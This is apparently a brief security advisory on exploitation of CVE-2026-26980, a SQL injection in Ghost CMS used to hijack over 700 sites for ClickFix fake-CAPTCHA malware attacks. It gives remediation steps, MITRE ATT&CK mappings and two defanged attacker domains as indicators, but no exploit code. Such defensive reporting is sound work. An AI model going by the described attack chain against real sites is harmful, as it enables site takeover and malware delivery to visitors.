Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks

Key Points:

• Exploitation of CVE-2026-26980, a critical SQL injection vulnerability in Ghost CMS, has led to the hijacking of over 700 websites for ClickFix attacks.
• Attackers can access admin API keys, allowing them to inject malicious JavaScript into compromised sites, which facilitates fake CAPTCHA attacks and further malware distribution.
• Immediate actions include upgrading Ghost CMS to version 6.19.1, rotating credentials, auditing access logs, and notifying affected users.

Technical Details: CVE-2026-26980 (CVSS score: 9.4) allows unauthenticated attackers to read arbitrary data from the database and gain unauthorized access to admin functionalities. The injected JavaScript serves as a two-stage loader that retrieves payloads from an external domain.

MITRE ATT&CK Techniques:

• T1190 - Exploit Public-Facing Application (Initial Access)
• T1071.001 - Application Layer Protocol: Web Protocols (Command and Control)
• T1059.001 - Command and Scripting Interpreter: PowerShell (Execution)
• T1203 - User Execution (Execution)

IOCs Mentioned:

• clo4shara[.]xyz
• web-telegram[.]ug